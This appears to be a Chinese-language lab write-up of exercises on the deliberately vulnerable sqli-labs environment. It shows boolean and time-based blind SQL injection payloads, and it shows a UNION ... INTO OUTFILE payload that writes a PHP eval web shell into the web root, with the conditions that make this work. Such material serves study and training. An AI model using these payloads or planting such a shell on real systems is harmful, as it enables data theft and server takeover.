作者：admin

1、尝试 1′ and ‘1’=’1 –+ 和 1′ and ‘1’=’2 –+ 返回不同页面
2、当其报错时，没有回显，无法使用报错注入；在使用order by 和 union select之后发现没有回显，故也无法使用联合注入。所以考虑盲注。先试试布尔盲注呢

3、布尔盲注-猜解数据库名
– 先猜数据库名长度再逐字猜数据库名
– 猜数据库名长度—1′ and length(database())=1 将length=1的1作为变量用burpsuite进行爆破
– 逐字猜解数据库名— 1′ and ascii(substr(database(),1,1))=97 #

说明其数据库长度为8.
再来猜他的第一个字符。1′ and ascii(substr(database(),1,1))=97,将97作为变量进行爆破

第一个字符的ASCII码是115，查ASCII码表可得对应的字符为’s’ 。
然后使用 1′ and ascii(substr(database(),2,1))=97进行爆破，注意这里是 database(),2,1—截取第二个字符。

同样的查表可得数据库名的第二个字符为’e’
其后的步骤略去不提，都是一样的，可查看之前的笔记 mysql-4 布尔盲注。

4、试试时间盲注呢。– 1′ and sleep(5) –+
在network那里可以明显的看到一个pending过程。

后续步骤不提，具体命令参考之前笔记 mysql-5 时间盲注

1、加入单引号后报错
2、尝试各种组合后发现 1′)) and 1=1 –+ 后返回正常。
3、对不起，我看答案了。是要考察写文件。执行 1′)) union select 1,2,3 into outfile “C:\phpstudy\WWW\sqli-labs\Less-7\test.txt” –+ ，发现报错。

访问一下test.txt 呢 。发现已经写入成功了

将test.txt换成 一句话试试
1′)) union select 1,2,’<?php @eval($_POST[123]);?>‘ into outfile “C:\phpstudy\WWW\sqli-labs\Less-7\test.php” –+
成功连接

这种写文件需要知道
1、绝对路径
2、需要当前用户拥有写的权限
3、目标目录可写
4、gpc=off
5、secure_file_priv 的值为空，如果为其他值，则只能写入到对应值的目录下